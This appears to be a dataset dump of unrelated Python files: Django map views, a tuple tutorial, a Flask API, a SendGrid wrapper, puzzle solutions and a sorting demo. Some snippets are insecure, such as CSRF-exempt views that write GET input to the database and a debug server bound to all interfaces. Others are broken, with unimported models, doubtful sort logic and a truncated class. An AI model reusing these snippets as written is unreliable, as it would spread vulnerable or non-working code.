text stringlengths 38 1.54M |
|---|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.template.context_processors import csrf
from django.conf import settings
from django.shortcuts import render_to_response
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from .models import mysearch
import os, sys
@csrf_exempt
def post_list(request):
    """Render the landing page template with an empty context."""
    context = {}
    return render(request, 'blog/post_list.html', context)
@csrf_exempt
def post_list1(request):
    """Persist one search record taken from the query string, then list all records."""
    params = request.GET
    mysearch.objects.create(
        title=params['title'],
        content=params['cont'],
        model_name=params['name'],
        created_data=params['time'],
    )
    return render(request, 'blog/post_list1.html', {'posts': mysearch.objects.all()})
def add_record(request):
    """
    Build the context for the main map page.

    Each 'infoN' flag present in the query string switches on one overlay
    layer; layers that are not requested stay None so the template can skip
    them.  The Ychouse and Highsoil layers are always included regardless of
    flags.  'info24'/'info25'/'info26' select the search radius.

    Raises KeyError if the 'add' (address) parameter is missing, as before.
    """
    # One slot per overlay layer; None means "layer not requested".
    layers = [None] * 20
    # Query-string flag -> (layer slot, model whose rows feed that layer).
    flag_to_layer = {
        'info1': (0, Busstation),
        'info2': (1, Mrtstation),
        'info3': (2, Park),
        'info4': (3, Gost),
        'info5': (4, Sensual),
        # BUGFIX: this slot previously assigned the unbound manager method
        # `Undertaker.objects.all` (missing call parentheses), handing the
        # template a method object instead of a queryset.
        'info6': (5, Undertaker),
        'info7': (6, Baby),
        'info8': (7, School),
        'info9': (8, Library),
        'info10': (9, Market),
        'info11': (10, Temple),
        'info12': (11, Carburg),
        'info13': (12, Houseurg),
        'info14': (13, Accide),
        'info15': (14, Alley),
        # 'info16' (slot 15) and 'info17' were already disabled upstream;
        # slot 15 is unconditionally filled with Ychouse below, and slots
        # 16/17 always render as None, matching the original behavior.
        'info20': (19, Hospital),
    }
    for flag, (slot, model) in flag_to_layer.items():
        if flag in request.GET:
            layers[slot] = model.objects.all()

    # Search radius; when several flags are present the last checked wins,
    # exactly as in the original sequential assignments.
    dist = 0
    if 'info24' in request.GET:
        dist = 300
    if 'info25' in request.GET:
        dist = 500
    if 'info26' in request.GET:
        dist = 1000

    context = {'posts': layers[0], 'address': request.GET['add'], 'dist': dist}
    for slot in range(1, 20):
        context['post%d' % slot] = layers[slot]
    # Always-on layers, independent of the query flags.
    context['post15'] = Ychouse.objects.all()
    context['post18'] = Highsoil.objects.all().values('lat', 'lng').distinct()
    return render(request, 'blog/add_record.html', context)
def add2_record(request):
    """
    Build the context for the second overlay page.

    Each 'infoNN' flag enables one (or, for 'info23', three) overlay layers.
    `check` records which flag group fired last, for the template.
    """
    overlays = [None] * 7
    selected = 0
    if 'info21' in request.GET:
        overlays[0] = Undertaker.objects.all()
        selected = 1
    if 'info22' in request.GET:
        overlays[1] = Sensual.objects.all()
        selected = 2
    if 'info23' in request.GET:
        # Three soil-quality layers, deduplicated on coordinates.
        overlays[2] = Lowsoil.objects.all().values('lat', 'lng').distinct()
        overlays[3] = Mediumsoil.objects.all().values('lat', 'lng').distinct()
        overlays[4] = Highsoil.objects.all().values('lat', 'lng').distinct()
        selected = 3
    if 'info24' in request.GET:
        overlays[5] = Houseurg.objects.all()
        selected = 4
    if 'info25' in request.GET:
        overlays[6] = Carburg.objects.all()
        selected = 5
    # Template keys are post20..post26, mirroring the overlay slots.
    context = {'post%d' % (20 + i): overlays[i] for i in range(7)}
    context['check'] = selected
    return render(request, 'blog/add2_record.html', context)
def add3_record(request):
    """Render the Ychouse layer together with the requested address and radius."""
    context = {
        'post11': Ychouse.objects.all(),
        'address': request.GET['add'],
        'dist': request.GET['dist'],
    }
    return render(request, 'blog/add3_record.html', context)
def add4_record(request):
    """
    Show one primary Ychouse record plus up to three related ones.

    The 'object' query parameter holds comma-separated oids: the primary oid
    first, followed by the oids of the related records.
    """
    # Renamed from `str`, which shadowed the builtin of the same name.
    oids = request.GET['object'].split(",")
    primary, related = oids[0], oids[1:4]
    post12 = Ychouse.objects.filter(oid__in=related)
    post13 = Ychouse.objects.get(oid=primary)
    return render(request, 'blog/add4_record.html', {'post12': post12, 'post13': post13})
# Create your views here.
# return render(request,'blog/add_record.html',{'posts':posts,'post2':post2,'post3':post3 ,'address':address,'dist':dist}) |
# TUPLES LESSON
# Tuples
# What is a Tuple in Python?
# A Python tuple is a collection type data structure which is immutable by design and holds a sequence of heterogeneous elements.
# It functions almost like a Python list but with the following distinctions. Tuples store a fixed set of elements
# and don’t allow changes whereas the list has the provision to update its content. The list uses square brackets
# for opening and closing whereas, and a tuple has got parentheses for the enclosure. A tuple can come quite handy for
# programmers in different situations.
# Python Tuple - Learn with Examples
# Python Tuple Data Structure How to instantiate a Tuple in Python?
# You can create a tuple by placing a sequence of desired elements separated using commas inside a pair of round
# brackets(), i.e., parentheses.
# Please note that you can create a tuple even without using the parentheses.
# Also, the elements of a tuple can be of any valid Python data types ranging from numbers, strings, lists, etc.
# Simple examples to create a tuple with different inputs
# --- Tuple creation demos: each statement prints what it builds. ---
# create an empty tuple
py_tuple = ()
print("A blank tuple:", py_tuple)
# create a tuple without using round brackets (a bare comma makes the tuple)
py_tuple = 33, 55, 77
print("A tuple set without parenthesis:", py_tuple, "type:", type(py_tuple))
# create a tuple of numbers
py_tuple = (33, 55, 77)
print("A tuple of numbers:", py_tuple)
# create a tuple of mixed numbers
# such as integer, float, imaginary
py_tuple = (33, 3.3, 3 + 3j)
print("A tuple of mixed numbers:", py_tuple)
# create a tuple of mixed data types
# such as numbers, strings, lists
py_tuple = (33, "33", [3, 3])
print("A tuple of mixed data types:", py_tuple)
# create a tuple of tuples
# i.e. a nested tuple
py_tuple = (('x', 'y', 'z'), ('X', 'Y', 'Z'))
print("A tuple of tuples:", py_tuple)
# output
# A blank tuple: ()
# A tuple set without parenthesis: (33, 55, 77)
# #### type: < class 'tuple'>
# A tuple of numbers: (33, 55, 77)
# A tuple of mixed numbers: (33, 3.3, (3 + 3j))
# A tuple of mixed data types: (33, '33', [3, 3])
# A tuple of tuples: (('x', 'y', 'z'), ('X', 'Y', 'Z'))
# Using the built-in function "tuple()" to create a tuple
# We can invoke the tuple function and get the desired result.
# creating a tuple from a set
# NOTE: set iteration order is arbitrary, so the element order of the
# resulting tuple is not guaranteed.
py_tuple = tuple({33, 55, 77})
type(py_tuple)
# <class 'tuple'>
py_tuple
# (33, 77, 55)
# creating a tuple from a list
py_tuple = tuple([33, 55, 77])
type(py_tuple)
# <class 'tuple'>
py_tuple
# (33, 55, 77)
# Creating a tuple of size one
# Create a tuple with a single element. It's not as easy to achieve as it looks.
# A single element surrounded by parentheses creates a string instead of a tuple
py_tuple = ('single')
type(py_tuple)
# <class 'str'>
# You need to place a comma after the first element to create a tuple of size "one"
py_tuple = ('single',)
type(py_tuple)
# <class 'tuple'>
# You can use a list of one element and convert it to a tuple
py_tuple = tuple(['single'])
type(py_tuple)
# <class 'tuple'>
# You can use a set of one element and convert it to a tuple
py_tuple = tuple({'single'})
type(py_tuple)
# <class 'tuple'>
# How can you access a tuple in Python?
# Python provides various intuitive mechanisms to access a single or a range of elements from a tuple.
# Via Indexing
# The simplest is the direct access method where you use the index operator[] to pick an item from the tuple.
# You can start indexing from the 0th position. It means if a tuple holds ten elements, then the index will begin at 0th
# and will end at 9th position. Violating the boundaries of a tuple will result in an IndexError.
# If the tuple contains other tuples as its elements, then you would need to index the elements tuple-by-tuple.
# --- Indexing demos: positive indices, out-of-range and wrong-type errors. ---
vowel_tuple = ('a', 'e', 'i', 'o', 'u')
print("The tuple:", vowel_tuple, "Length:", len(vowel_tuple))
# Indexing the first element
print("OP(vowel_tuple[0]):", vowel_tuple[0])
# Indexing the last element
print("OP(vowel_tuple[length-1]):", vowel_tuple[len(vowel_tuple) - 1])
# Indexing a non-existent member
# will raise the IndexError
try:
    print(vowel_tuple[len(vowel_tuple) + 1])
except Exception as ex:
    print("OP(vowel_tuple[length+1]) Error:", ex)
# Indexing with a non-integer index
# will raise the TypeError
try:
    print(vowel_tuple[0.0])
except Exception as ex:
    print("OP(vowel_tuple[0.0]) Error:", ex)
# Indexing in a tuple of tuples: first index picks the sub-tuple,
# second index picks the element inside it.
t_o_t = (('jan', 'feb', 'mar'), ('sun', 'mon', 'wed'))
# Accessing elements from the first sub tuple
print("OP(t_o_t[0][2]):", t_o_t[0][2])
# Accessing elements from the second sub tuple
print("OP(t_o_t[1][2]):", t_o_t[1][2])
# output
# The tuple: ('a', 'e', 'i', 'o', 'u')
# Length: 5
# OP(vowel_tuple[0]): a
# OP(vowel_tuple[length - 1]): u
# OP(vowel_tuple[length + 1])
# Error: tuple index out of range
# OP(vowel_tuple[0.0])
# Error: tuple indices must be integers or slices, not float
# OP(t_o_t[0][2]): mar
# OP(t_o_t[1][2]): wed
# Via Reverse Indexing
# Python tuple supports reverse indexing, i.e., accessing elements using the(-ve) index values.
# The reverse indexing works in the following manner. The index - 1 represents the last item.
# An index with value - 2 will refer to the second item from the rear end.
# --- Reverse indexing and slicing demos. ---
# NOTE: the bare expressions below only echo their value in an interactive
# session; run as a script they are evaluated and discarded.
vowels = ('a', 'e', 'i', 'o', 'u')
vowels
# ('a', 'e', 'i', 'o', 'u')
vowels[-1]
# 'u'
vowels[-2]
# 'o'
vowels[-5]
# 'a'
# vowels[-6]
# Traceback(most recent call last): File "<pyshell#64>", line 1, in < module > vowels[-6]
# IndexError: tuple index out of range
# Via Slicing Operator
# If you need to access not one but more than one element from a tuple, then Python's slicing operator can come to use.
# The single colon, i.e., a ":" represents the slicing operator in Python.
weekdays = ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
weekdays
# ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements leaving the first one
weekdays[1:]
# ('tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements between the first and fifth positions
# excluding the ones at the first and fifth position
weekdays[1:5]
# ('tue', 'wed', 'thu', 'fri')
# accessing elements after the fifth position
weekdays[5:]
# ('sat', 'sun')
# accessing the first five elements
weekdays[:5]
# ('mon', 'tue', 'wed', 'thu', 'fri')
# accessing elements that appear after
# counting five from the rear end
weekdays[:-5]
# ('mon', 'tue')
# accessing five elements from the rear
weekdays[-5:]
# ('wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements from the start to end (shallow copy of the tuple)
weekdays[:]
# ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# How to modify / update a tuple in Python?
# Since tuples are immutable, so it seems no way to modify them. Once you assign a set of elements to a tuple,
# Python won’t allow it to change. But, there is a catch, what if the items you set are modifiable.
# If there is such a case, then you can change the elements instead of directly modifying the tuple.
# You can even set a tuple to have different values.
# --- Mutation demos: the tuple itself is immutable, but a mutable element
# --- (the embedded list) can still be changed in place. ---
py_tuple = (22, 33, 55, 66, [88, 99])
print("Tuple before modificaton:", py_tuple)
# Let's try to modify py_tuple
# It'll return a TypeError
try:
    py_tuple[0] = 11
except Exception as ex:
    print("OP(py_tuple[0]) Error:", ex)
# We can change the values of mutable
# elements inside the py_tuple i.e. list
py_tuple[4][0] = 77
py_tuple[4][1] = 88
print("Tuple after modificaton:", py_tuple)
# We can rebind the name to a brand-new tuple
py_tuple = ('mon', 'tue', 'wed')
print("Tuple after reassignment:", py_tuple)
# output
# Tuple before modificaton: (22, 33, 55, 66, [88, 99])
# OP(py_tuple[0])
# Error: 'tuple' object does not support item assignment
# Tuple after modificaton: (22, 33, 55, 66, [77, 88])
# Tuple after reassignment: ('mon', 'tue', 'wed')
# You can extend the behavior of a tuple by using the + (concatenation) and *(repeat) operators.
# The plus operator helps you join the two distinct tuples.
first_tuple = ('p', 'y', 't')
second_tuple = ('h', 'o', 'n')
full_tuple = first_tuple + second_tuple
full_tuple
# ('p', 'y', 't', 'h', 'o', 'n')
# The star operator helps you repeat the elements in a tuple for a specified number of times.
init_tuple = ("fork",)
fork_tuple = init_tuple * 5
fork_tuple
# ('fork', 'fork', 'fork', 'fork', 'fork')
# How to remove / delete a tuple in Python?
# Immutability of a tuple would again prevent you from deleting it in a Python program.
# While you can’t delete a tuple directly, but here is something which can help.
# The Python’s del keyword can make you delete a tuple.
# --- Deletion demos: single-item deletion fails, whole-tuple deletion works. ---
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
# you can't delete a particular item from a tuple
try:
    del py_tuple[0]
except Exception as ex:
    print("OP(del py_tuple[0]) Error:", ex)
# but you can delete a whole tuple (unbinds the name)
del py_tuple
try:
    print(py_tuple)
except Exception as ex:
    print("print(py_tuple) => Error:", ex)
# output
# del py_tuple[0] = > Error: 'tuple'
# object doesn't support item deletion
# print(py_tuple) = > Error: name 'py_tuple' is not defined
# Miscellaneous Tuple Operations
# Testing membership in Python tuple
# Just like we did in Python set, here also, the “ in ” keyword will help us exercise the membership test on a tuple.
# --- Membership tests with `in` / `not in`, then element-wise traversal. ---
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
print("First Test: Does 'p' exist?", 'p' in py_tuple)
# First Test: Does 'p' exist? True
print("Second Test: Does 'z' exist?", 'z' in py_tuple)
# Second Test: Does 'z' exist? False
print("Third Test: Does 'n' exist?", 'n' in py_tuple)
# Third Test: Does 'n' exist? True
print("Last Test: Does 't' not exist?", 't' not in py_tuple)
# Last Test: Does 't' not exist? False
# Traversing in a Python tuple
# You can form a for loop and one by one access all the elements in a tuple.
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
for item in py_tuple:
    print("Item:", item)
#
# Item: p
# Item: y
# Item: t
# Item: h
# Item: o
# Item: n
# Usage of Python Tuples
# Used for grouping data
# The tuple provides a quick way of grouping and arranging data.
# It can help you combine any number of elements into a single unit.
# They can help us representing information in the form of records such as the employee record.
# A tuple allows us to group related information and use it as a single entity.
# --- Grouping data in a flat record tuple, then tuple unpacking. ---
emp_records = ('john', 'hr', 2010, 'robert', 'account', 2015, 'bill', 'mis', 2018)
emp_records[3]
# 'robert'
# Assign to a tuple
# Python tuple supports a very intuitive feature known as "tuple assignment."
# It lets us assign a tuple of variables on the left of a statement to initialize from the tuple on the right side.
emp_records = ('john', 'hr', 2010, 'robert', 'account', 2015, 'bill', 'mis', 2018)
# Unpack the first record's three fields into separate names.
(emp_name, emp_dept, emp_join_date) = emp_records[0:3]
emp_name
# 'john'
emp_dept
# 'hr'
emp_join_date
# 2010
# Using tuples in functions as return values
# Usually, a function only returns one value. However, we can introduce a tuple and set it as the return value for the function.
# It means, we can combine multiple values and store them in a tuple and finally return it.
# It could come quite handy in situations when we want to know the hours, minutes, seconds consumed by a job, or to
# get the counts of different types of accessories or the prices of multiple books written by a particular author.
def square(n1, n2):
    """Return a tuple holding the squares of both arguments."""
    return n1 ** 2, n2 ** 2

# A function can hand back several values at once by returning a tuple.
print(type(square(2, 3)))
# output
# <class 'tuple'>
# Mixed Data Structures in the form of tuples
# Tuples are a type of container which can embed another tuple as an element.
# We call such an object as a nested tuple.
# For example, if we have to maintain employee counts in each department along with their
# names, position, and salaries, the nested tuples can let us do this efficiently.
# employes = [
# ("HR", 2, [('david', 'manager', 100000), ('bruno', 'asst manager', 50000)])
# ("IT", 2, [('kirk', 'team lead', 150000), ('matt', 'engineer', 45000)])
# ("Sales", 2, [('billy', 'sales lead', 250000), ('tom', 'executive', 95000)])
# ] |
# -*- coding: utf-8 -*-
from datetime import datetime
import pika,time,random
from app_demo1.lib.redisConnector import Connector as redisConnector
from app_demo1.config import config as CONFIG
'''
对已创建任务未执行任务进行切片环境匹配检查,有空闲且匹配的环境则发送给对应worker的消息通道
'''
def send_task(self,task,slave):
    """
    Publish a task payload to the Redis task topic.

    NOTE(review): the `task` and `slave` parameters are currently ignored --
    `task` is immediately overwritten with a hard-coded sample payload,
    which looks like placeholder/test data; confirm before relying on this.
    """
    # Send the task to Redis (the dict below overwrites the argument).
    task = {
        "id": "taskid123456",
        "name": "name123",
        "slave": "slave1",
        "version": "version001",
        "project": "pro1",
        "cases": ["suite1", "suite111", "suite2", "suite211", "suite3", "suite311", "suite411", "suite4"]
    }
    redis = redisConnector()
    redis.publish(CONFIG.TASK_TOPIC,task)
def send_task1(self, task, slave):
    """Publish a freshly built task to the 'hello1' RabbitMQ queue."""
    # Open a connection and a channel to the local broker; the channel is
    # the pipe through which queue operations run.
    conn = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
    ch = conn.channel()
    # Make sure the target queue exists before publishing.
    ch.queue_declare(queue='hello1')
    payload = str(self.build_task())
    # The default exchange ('') routes directly to the queue named by
    # routing_key.
    ch.basic_publish(exchange='',
                     routing_key='hello1',
                     body=payload)
    conn.close()
if __name__ == '__main__':
    # Poll-loop placeholder: repeatedly check the task database for pending
    # tasks and match them to idle workers (matching logic not implemented
    # yet -- the loop currently only sleeps).
    while True:
        time.sleep(2)
"""
Exercise from: https://www.practicepython.org/exercise/2014/12/14/23-file-overlap.html
Code created by Ruben Jimenez
"""
def filetoIntlist(theFile):
    """Read a text file containing one integer per line into a list of ints."""
    with open(theFile, 'r') as f:
        # Iterating the file yields one line at a time; int() tolerates the
        # trailing newline on each line.
        return [int(line) for line in f]
def run():
    """Print the numbers that appear in both input files.

    Reads 'primenumbers.txt' and 'happynumbers.txt' (one integer per line)
    and prints the list of primes that are also happy, preserving the order
    of 'primenumbers.txt'.
    """
    primenum = filetoIntlist('primenumbers.txt')
    # A set gives O(1) membership tests; the original list scan made the
    # overlap computation O(n*m).
    happynum = set(filetoIntlist('happynumbers.txt'))
    overlap = [number for number in primenum if number in happynum]
    print(overlap)


if __name__ == "__main__":
    run()
from flask import Flask, make_response
import dadosApiRest
app = Flask(__name__)
def _cors_response(payload):
    """Wrap *payload* in a response that allows any cross-origin access."""
    response = make_response(payload)
    response.headers['Access-Control-Allow-Origin'] = "*"
    return response


@app.route('/getDisciplinasPorPeriodo')
def disciplinas_por_periodo():
    """Return the subjects grouped by academic period."""
    return _cors_response(dadosApiRest.disciplinas_por_periodo())


@app.route('/getPreRequisito')
def pre_requisitos():
    """Return the prerequisite data."""
    return _cors_response(dadosApiRest.pre_requisitos())


@app.route('/getMaioresFrequencias')
def maiores_frequencias():
    """Return the highest-attendance data."""
    return _cors_response(dadosApiRest.maiores_frequencias())
if __name__ == '__main__':
    # Debug mode enables the reloader and the interactive debugger.
    # NOTE(review): debug=True must not ship to production -- the Werkzeug
    # debugger allows arbitrary code execution.
    app.debug = True
    # Bind to all interfaces so the API is reachable from other hosts.
    app.run(host='0.0.0.0')
|
# -*- coding: utf-8 -*-
###############################################################################
#
# SendMail
# Allows you to send emails.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class SendMail(Choreography):
    """Choreo wrapper for the SendGrid WebAPI SendMail endpoint."""

    def __init__(self, temboo_session):
        """
        Create a new instance of the SendMail Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(SendMail, self).__init__(temboo_session, '/Library/SendGrid/WebAPI/Mail/SendMail')

    def new_input_set(self):
        # Factory for the input container used to parameterize an execution.
        return SendMailInputSet()

    def _make_result_set(self, result, path):
        # Wrap a raw execution result in the typed result set.
        return SendMailResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Handle for an in-flight asynchronous execution of this Choreo.
        return SendMailChoreographyExecution(session, exec_id, path)
class SendMailInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the SendMail
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """

    def set_FileContents(self, value):
        """
        Set the value of the FileContents input for this Choreo. ((optional, string) The Base64-encoded contents of the file you want to attach.)
        """
        super(SendMailInputSet, self)._set_input('FileContents', value)

    def set_APIKey(self, value):
        """
        Set the value of the APIKey input for this Choreo. ((required, string) The API Key obtained from SendGrid.)
        """
        super(SendMailInputSet, self)._set_input('APIKey', value)

    def set_APIUser(self, value):
        """
        Set the value of the APIUser input for this Choreo. ((required, string) The username registered with SendGrid.)
        """
        super(SendMailInputSet, self)._set_input('APIUser', value)

    def set_BCC(self, value):
        """
        Set the value of the BCC input for this Choreo. ((optional, string) Enter a BCC recipient. Multiple recipients can also be passed in as an array of email addresses.)
        """
        super(SendMailInputSet, self)._set_input('BCC', value)

    def set_Date(self, value):
        """
        Set the value of the Date input for this Choreo. ((optional, string) NOTE(review): the original description ("The timestamp of the Block records. Enter 1 to return a date in a MySQL timestamp format - YYYY-MM-DD HH:MM:SS") looks copy-pasted from a different Choreo; for SendMail this presumably sets the message date -- confirm against the SendGrid mail.send documentation.)
        """
        super(SendMailInputSet, self)._set_input('Date', value)

    def set_FileName(self, value):
        """
        Set the value of the FileName input for this Choreo. ((optional, string) The name of the file you are attaching to your email.)
        """
        super(SendMailInputSet, self)._set_input('FileName', value)

    def set_FromName(self, value):
        """
        Set the value of the FromName input for this Choreo. ((optional, string) The name to be appended to the from email. For example, your company name, or your name.)
        """
        super(SendMailInputSet, self)._set_input('FromName', value)

    def set_From(self, value):
        """
        Set the value of the From input for this Choreo. ((required, string) The originating email address. Must be from your domain.)
        """
        super(SendMailInputSet, self)._set_input('From', value)

    def set_HTML(self, value):
        """
        Set the value of the HTML input for this Choreo. ((conditional, string) The HTML to be used in the body of your email message. Required unless specifying a plain text body in the Text input.)
        """
        super(SendMailInputSet, self)._set_input('HTML', value)

    def set_Headers(self, value):
        """
        Set the value of the Headers input for this Choreo. ((optional, json) The collection of key/value pairs in JSON format. Each key represents a header name and the value the header value. For example: {"X-Accept-Language": "en", "X-Mailer": "MyApp"})
        """
        super(SendMailInputSet, self)._set_input('Headers', value)

    def set_ReplyTo(self, value):
        """
        Set the value of the ReplyTo input for this Choreo. ((optional, string) The email address to append to the reply-to field of your email.)
        """
        super(SendMailInputSet, self)._set_input('ReplyTo', value)

    def set_ResponseFormat(self, value):
        """
        Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format of the response from SendGrid, in either json, or xml. Default is set to json.)
        """
        super(SendMailInputSet, self)._set_input('ResponseFormat', value)

    def set_Subject(self, value):
        """
        Set the value of the Subject input for this Choreo. ((required, string) The subject of the email message.)
        """
        super(SendMailInputSet, self)._set_input('Subject', value)

    def set_Text(self, value):
        """
        Set the value of the Text input for this Choreo. ((conditional, string) The text of the email message. Required unless providing the message body using the HTML input.)
        """
        super(SendMailInputSet, self)._set_input('Text', value)

    def set_ToName(self, value):
        """
        Set the value of the ToName input for this Choreo. ((optional, string) The name of the email recipient.)
        """
        super(SendMailInputSet, self)._set_input('ToName', value)

    def set_To(self, value):
        """
        Set the value of the To input for this Choreo. ((required, string) The valid recipient email address. Multiple addresses can be entered as elements of an array.)
        """
        super(SendMailInputSet, self)._set_input('To', value)

    def set_XSMTPAPI(self, value):
        """
        Set the value of the XSMTPAPI input for this Choreo. ((optional, json) Must be valid JSON format. See here for additional info: http://docs.sendgrid.com/documentation/api/smtp-api/)
        """
        super(SendMailInputSet, self)._set_input('XSMTPAPI', value)
class SendMailResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the SendMail Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """

    def getJSONFromString(self, json_string):
        """Deserialize *json_string* (a JSON document) and return the result."""
        # Parameter renamed from `str`, which shadowed the builtin.
        return json.loads(json_string)

    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from SendGrid. The format corresponds to the ResponseFormat input. Default is json.)
        """
        return self._output.get('Response', None)
class SendMailChoreographyExecution(ChoreographyExecution):
    """Execution handle for an asynchronous run of the SendMail Choreo."""

    def _make_result_set(self, response, path):
        # Wrap the raw response in the SendMail-specific result set.
        return SendMailResultSet(response, path)
|
import re

# Handheld-console interpreter (Advent of Code 2020 day 8, part 1): execute
# the program until any instruction is about to run a second time, then
# print the accumulator value at that moment.
lines = open('input.txt').read().replace('\n\n', '\n').split('\n')

INSTRUCTION_RE = re.compile(r'(\S+) ([+-])(\d+)')

accumulator = 0
seen = []          # program counters already executed once
pc = 0
while pc < len(lines):
    if pc in seen:
        # About to loop forever -- report the accumulator and stop.
        print(accumulator)
        break
    seen.append(pc)
    op, sign, magnitude = INSTRUCTION_RE.match(lines[pc]).group(1, 2, 3)
    delta = int(magnitude) if sign == '+' else -int(magnitude)
    if op == 'acc':
        accumulator += delta
        pc += 1
    elif op == 'jmp':
        pc += delta
    elif op == 'nop':
        pc += 1
|
# Given an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.
# You may assume that the array is non-empty and the majority element always exist in the array.
# Example 1:
# Input: [3,2,3]
# Output: 3
# Example 2:
# Input: [2,2,1,1,1,2,2]
# Output: 2
class Solution:
    """LeetCode 169 -- majority element (the value appearing more than n//2 times).

    The array is assumed non-empty with a guaranteed majority element.
    """

    def majorityElement1(self, nums: list) -> int:
        """Count occurrences in a dict and return the most frequent value.

        BUGFIX: the original annotations used `List[int]` without
        `from typing import List`, raising NameError when the class was
        defined; the builtin `list` needs no import.
        """
        counts = {}
        for num in nums:
            counts[num] = counts.get(num, 0) + 1
        return max(counts, key=counts.get)

    def majorityElement2(self, nums: list) -> int:
        """Check each distinct value's count against the majority threshold."""
        threshold = len(nums) // 2
        for num in set(nums):
            if nums.count(num) > threshold:
                return num
"""
Sort
Quck Sort - Pivots
Get the first value (current value), itterate through the unsorted list and
place anything that is smaller than the current value to the left of it. Set
this value as a pivot, and then repeat for the next value.
"""
def Quick_Sort_Pivots(array, show):
    """
    Demonstration 'quick sort with pivots' over a list of strings.

    Repeatedly marks an unmarked element as a pivot (by appending "P" to the
    string) and moves smaller elements before it, until every element carries
    the "P" marker.  Mutates `array` in place; prints progress when `show`
    is truthy.

    NOTE(review): the source arrived with all indentation stripped; the
    nesting below is a best-effort reconstruction -- verify against the
    original file.  The comparisons against `array[y][1]` (the second
    character of a marked element) also look suspicious and should be
    double-checked.
    """
    def Show_Values():
        # Print the working array only when tracing is enabled.
        if show == True:
            print(array)
    continueLoop = True
    while continueLoop == True:
        Show_Values()
        continueLoop = False
        # Pick the first element not yet marked as a pivot and mark it.
        for i in range(0, len(array)):
            if "P" in array[i]:
                continue
            elif "P" not in array[i]:
                current_value = array[i]
                current_value_poss = i
                array[current_value_poss] = array[current_value_poss] + "P"
                print("Current Value is ", current_value, " at poss: ", current_value_poss)
                Show_Values()
                break
        # Re-position elements relative to the existing pivots.
        for x in range(0, len(array)-1):
            if x == current_value_poss:
                # The freshly marked pivot: compare it against other pivots.
                for y in range(0, len(array)-1):
                    if "P" in array[y]:
                        if array[x][0] > array[y][1]:
                            print(array[x], " > ", array[y])
                            continue
                        elif array[x][0] < array[y][1]:
                            # Move the pivot before the larger pivot at y.
                            print(array[x], " insert to poss ", y)
                            tmp = array[x]
                            del array[x]
                            array.insert(y, tmp)
                        else:
                            continue
                Show_Values()
            elif "P" in array[x]:
                # Other pivots stay where they are.
                continue
            else:
                # An unmarked value: slot it in among the pivots.
                print("the current value to be sorted amungst pivots is: ", array[x])
                for y in range(0, len(array)-1):
                    if "P" in array[y]:
                        if array[x] > array[y][1]:
                            print(array[x], " > ", array[y])
                            continue
                        elif array[x] < array[y][1]:
                            print(array[x], " insert to poss ", y)
                            tmp = array[x]
                            del array[x]
                            array.insert(y, tmp)
                        else:
                            continue
                Show_Values()
        # Keep looping while any element is still unmarked.
        for i in range(0, len(array)):
            if "P" in array[i]:
                continue
            else:
                continueLoop = True
"""
Get the first value (current value)
itterate through the unsorted list
place anything that is smaller than the current to left
Set this value as a pivot
repeat for the next value
"""
# --- Interactive driver for Quick_Sort_Pivots ----------------------------
arrayInp = input("input an unordered list to search, separated by commas: ")
arrayInp = arrayInp.split(",")
print("Array: \n ", arrayInp)
# BUGFIX: bool(input(...)) was True for ANY non-empty reply, including the
# literal string "False"; parse the answer explicitly instead.
display = input("Show process? (True/False): ").strip().lower() == "true"
print(len(arrayInp))
Quick_Sort_Pivots(arrayInp, display)
"""
elif "P" not in array[i] and array[i] > current_value:
print(array[i], " is bigger than ", current_value)
print("Swap being made at pos ", i, " and poss ", current_value_poss)
tmp = array[i]
del array[i]
array.insert(current_value_poss + 1, tmp)
current_value_poss -= 1
print("current value possition: ", current_value_poss)
Show_Values()
else:
continue
elif "P" not in array[i] and array[i] < current_value:
print(array[i], " is smaller than ", current_value)
print("Swap being made at pos ", i, " and poss ", current_value_poss)
tmp = array[i]
del array[i]
array.insert(current_value_poss, tmp)
current_value_poss += 1
print("current value possition: ", current_value_poss)
Show_Values()
"""
|
from dataclasses import dataclass
@dataclass
class MockLine:
    """
    Helper class for testing line drawing.

    A line drawn A->B is considered equal to one drawn B->A, so equality,
    hashing and all ordering comparisons normalize the endpoint order first.

    Fixes over the previous version: __hash__ is now actually defined (the
    docstring claimed it was overridden, but defining only __eq__ left the
    class unhashable), and the full set of ordering methods is provided --
    Python does not derive >=/<=/> from __lt__, so the existing tests'
    `l1 >= l2` comparisons raised TypeError.
    """
    p1: tuple
    p2: tuple

    def _key(self):
        # Canonical, endpoint-order-independent representation.
        return sorted([self.p1, self.p2])

    def __eq__(self, other):
        return isinstance(other, MockLine) and self._key() == other._key()

    def __hash__(self):
        # Consistent with __eq__: equal lines hash equally.
        return hash(tuple(self._key()))

    def __lt__(self, other):
        """Order by the sorted endpoint pair so A->B and B->A sort alike."""
